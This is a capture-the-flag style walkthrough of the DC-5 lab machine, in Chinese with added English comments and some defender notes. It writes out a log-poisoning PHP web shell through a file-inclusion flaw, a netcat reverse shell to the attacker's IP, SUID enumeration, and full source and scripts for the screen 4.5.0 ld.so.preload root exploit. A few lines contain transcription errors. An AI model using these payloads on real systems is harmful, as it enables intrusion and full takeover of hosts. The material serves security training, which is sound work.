DC-5

# 主机探测

# Host discovery on the local /24: an ARP sweep of the attached segment
# (arp-scan -l), then an nmap ping sweep (-sP) of the same range.
arp-scan -l
nmap -sP 192.168.43.0/24

D主机存活

# 端口扫描

# Quick port scan of the host found above: -F (nmap's reduced "fast" port
# list), -sS half-open SYN probes, -T4 aggressive timing, -v verbose output.
nmap -F -sS -T4 -v 192.168.43.8

D端口扫描：80、111

# 目录爆破

# Directory brute force of the web root; -e php restricts extension guessing
# to .php, matching the php+nginx stack noted below.
dirsearch -u http://192.168.43.8 -e php

D目录扫描

# Web界面

页面内容只是一些拉丁文，没啥用

组件:php+nginx1.6.2

读取nginx配置文件信息,发现nginx日志记录文件路径
Nginx配置文件路径: /etc/nginx/nginx.conf

Nginx日志文件路径: /var/log/nginx/access.log /var/log/nginx/error.log

存在文件包含漏洞

D80端口

# BP抓包-分析

GET /thinkyou.php?file=/etc/passwd HTTP/1.1

GET /thinkyou.php?file=<?php system($_GET['cmd']);?> HTTP/1.1

GET /thankyou.php?file=/var/log/nginx/error.log&cmd=ls

DGET

![屏幕截图 2023-10-15 155415](assets/屏幕截图 2023-10-15 155415-20231015155420-clfsa37.png)

Dnginx日志D

# 反弹shell

# Reverse shell through the same log-include path used above. Lines under
# "kali:" run on the attacking host, the line under "BP:" is the request sent
# from Burp. Defender note: the indicator here is a shell spawned under the
# php/nginx worker and an outbound nc connection from the web host.
kali:
nc -lvvp 8888

BP:
GET /thankyou.php?file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.43.33 8888

Dkalinc

DbpNC

# 低权限交互式shell

# Upgrade the bare reverse shell to a pty-backed bash (prompt, job control)
# using the python interpreter present on the target.
python -c 'import pty;pty.spawn("/bin/bash")'

# 提权

尝试SUID

suid提权: Nmap、Vim、find、Bash、More、Less、Nano、cp

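# Enumerate setuid binaries — the same listing a hardening audit produces.
# First form: root-owned files with the setuid bit (-perm -4000); second form:
# any regular file with u+s regardless of owner. stderr is discarded to hide
# permission-denied noise from unreadable directories.
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# `{}` and `\;` have to be separate words; the transcribed `{}\;` collapses to
# one word, so find never sees the -exec terminator and aborts. stderr is
# dropped here too, for consistency with the two commands above.
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null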

存在screen 4.5.0
# Look up the screen version observed on the box in the local exploit-db
# mirror, then read the matching script (41154.sh) that the later steps adapt.
searchsploit screen 4.5.0

cat 41154.sh

Dscreen

# kali本地编辑

创建libhax.c文件
#include <stdio.h>
#include <sys/types.h>
#include \<unistd.h\>
/* Constructor: runs when this shared object is loaded. It makes /tmp/rootshell
 * owned by uid/gid 0 with mode 04755 (setuid bit) and then deletes
 * /etc/ld.so.preload. Defender note: creation of /etc/ld.so.preload and a new
 * root-owned setuid file under /tmp are the artifacts to alert on (file
 * integrity monitoring / auditd watches on both paths). */
attribute ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\\n");
}

编译libhax.c文件为libhax.so

新建rootshell.c
#include <stdio.h>
/* Helper binary that the library above marks setuid root: sets real and
 * effective uid/gid to 0 (only effective once the file carries the setuid
 * bit) and execs /bin/sh. A root-owned setuid executable appearing in /tmp is
 * the thing to hunt for. */
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}

编译rootshell.c文件为rootshell

创建dc5.sh文件
# dc5.sh as transcribed from 41154. Root cause (the author's own remark on the
# screen -ls line): screen is setuid root, so the -L log file is created with
# root's privileges — which is how an unprivileged user gets to write
# /etc/ld.so.preload here. Mitigation is patching screen or removing its setuid
# bit; detection is a watch on /etc/ld.so.preload.
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshel

D51154

# 上传到靶机tmp下

kali:
# Stage the three files into the target's /tmp over plain nc. Each "kali:"
# listener serves exactly one connection, so the pairs are run one at a time.
# Defender note: outbound nc connections from (presumably) the web-server
# account, followed by new executables in /tmp, are what egress and process
# monitoring should surface here.
kali:
nc -nlvp 2333 < libhax.so
nc -nlvp 2333 < rootshell
nc -nlvp 2333 < dc5.sh
目标机:
nc 192.168.43.33 2333 > libhax.so
nc 192.168.43.33 2333 > rootshell
nc 192.168.43.33 2333 > dc5.sh

D-3nc

# 运行dc5.sh

# On the target: confirm the staged files landed, make the trigger script
# executable and run it.
cd /tmp
ls
chmod +x dc5.sh
./dc5.sh

# FLAG

# Confirm the resulting identity and read the flag.
whoami
cat /root/flag.txt